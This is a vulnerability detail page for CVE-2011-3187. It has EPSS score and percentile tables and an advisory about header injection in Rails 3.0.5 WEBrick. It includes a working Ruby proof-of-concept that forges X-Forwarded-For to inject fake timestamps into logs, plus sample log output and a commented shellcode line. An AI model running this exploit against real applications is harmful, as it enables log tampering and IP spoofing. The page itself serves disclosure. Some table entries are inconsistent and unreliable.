CVE-2011-3187 : Detail

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

Date	EPSS V0	EPSS V1	EPSS V2 (> 2022-02-04)	EPSS V3 (> 2025-03-07)	EPSS V4 (> 2025-03-17)
2022-02-06	–	–	11%	–	–
2022-04-03	–	–	11%	–	–
2022-05-22	–	–	11%	–	–
2023-03-12	–	–	–	1.52%	–
2023-04-02	–	–	–	1.35%	–
2023-05-28	–	–	–	1.25%	–
2023-07-30	–	–	–	1.37%	–
2023-09-17	–	–	–	1.62%	–
2024-02-11	–	–	–	1.62%	–
2024-06-02	–	–	–	1.62%	–
2024-06-02	–	–	–	1.62%	–
2024-06-09	–	–	–	–	–
2024-06-09	–	–	–	1.62%	–
2024-06-16	–	–	–	1.62%	–
2024-12-15	–	–	–	1.69%	–
2024-12-22	–	–	–	1.69%	–
2025-01-26	–	–	–	1.69%	–
2025-01-19	–	–	–	1.69%	–
2025-01-25	–	–	–	1.69%	–
2025-03-18	–	–	–	–	11.02%
2025-04-29	–	–	–	–	9.42%
2025-04-29	–	–	–	–	9.42,%

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

Date	Percentile
2022-02-06	89%
2022-04-03	94%
2022-05-22	95%
2023-03-12	85%
2023-04-02	84%
2023-05-28	84%
2023-07-30	85%
2023-09-17	86%
2024-02-11	87%
2024-06-02	87%
2024-06-02	87%
2024-06-09	87%
2024-06-09	87%
2024-06-16	88%
2024-12-15	88%
2024-12-22	87%
2025-01-26	88%
2025-01-19	87%
2025-01-25	88%
2025-03-18	93%
2025-04-29	92%
2025-04-29	92%

source: https://www.securityfocus.com/bid/46423/info Ruby on Rails is prone to a vulnerability that allows attackers to inject arbitrary content into the 'X-Forwarded-For', 'X-Forwarded-Host' and 'X-Forwarded-Server' HTTP headers because the 'WEBrick::HTTPRequest' module fails to sufficiently sanitize input. By inserting arbitrary data into the affected HTTP header field, attackers may be able to launch cross-site request-forgery, cross-site scripting, HTML-injection, and other attacks. NOTE: This issue only affects requests sent from clients on the same subnet as the server. Ruby on Rails 3.0.5 is vulnerable; other versions may also be affected. #Encoding: UTF-8 # # Log-File-Injection - Ruby on Rails 3.05 # possibilities: # - possible date back attacks (tried with request-log-analyzer: worked but teaser_check_warnings) # - ip spoofing # - binary log-injections # - DOS if ip is used with an iptables-ban-script # # !! works only on intranet apps !! # # Fix: # validate request.remote_ip until they fix it # ----------------------- # jimmybandit.com # http://webservsec.blogspot.com require 'rubygems' require 'mechanize' require 'iconv' ip = "192.168.1.21 " # some shell code just for binary-data demo payload = ip + "at Mon Jan 01 00:00:00 +1000 2009\x0D\0x0A" # date back attacks with ipspoofing # payload = "\x31\xc0\x31\xdb\xb0\x17\xcd\x80" binarypayload is also possible a = Mechanize.new a.pre_connect_hooks << lambda { |p| p[:request]['X-Forwarded-For'] = payload } page = a.get('http://192.168.1.21/people') # results =begin ################################ production.log: ################################ Started GET "/people" for 192.168.1.21 at Mon Jan 01 00:00:00 +1000 2009 at Sun Mar 13 17:47:47 +0100 2011 Processing by PeopleController#index as Rendered people/index.html.erb within layouts/application (24.4ms) Completed 200 OK in 63ms (Views: 32.9ms | ActiveRecord: 3.6ms) ################################ request-log-analyzer: ################################ web@debian:~/testapp/log$ request-log-analyzer production.log Request-log-analyzer, by Willem van Bergen and Bart ten Brinke - version 1.10.0 Website: http://railsdoctors.com production.log: 100% [==========] Time: 00:00:00 Request summary ??????????????????????? Parsed lines: 14 Skipped lines: 0 <------- Parsed requests: 7 <------- Skipped requests: 0 Warnings: teaser_check_failed: 7 First request: 2009-01-01 00:00:12 Last request: 2009-01-01 00:00:12 Total time analyzed: 0 days Request distribution per hour ???????????????????????????? 0:00 ? 7 hits/day ? ��������������������������������� 1:00 ? 0 hits/day ? ... =end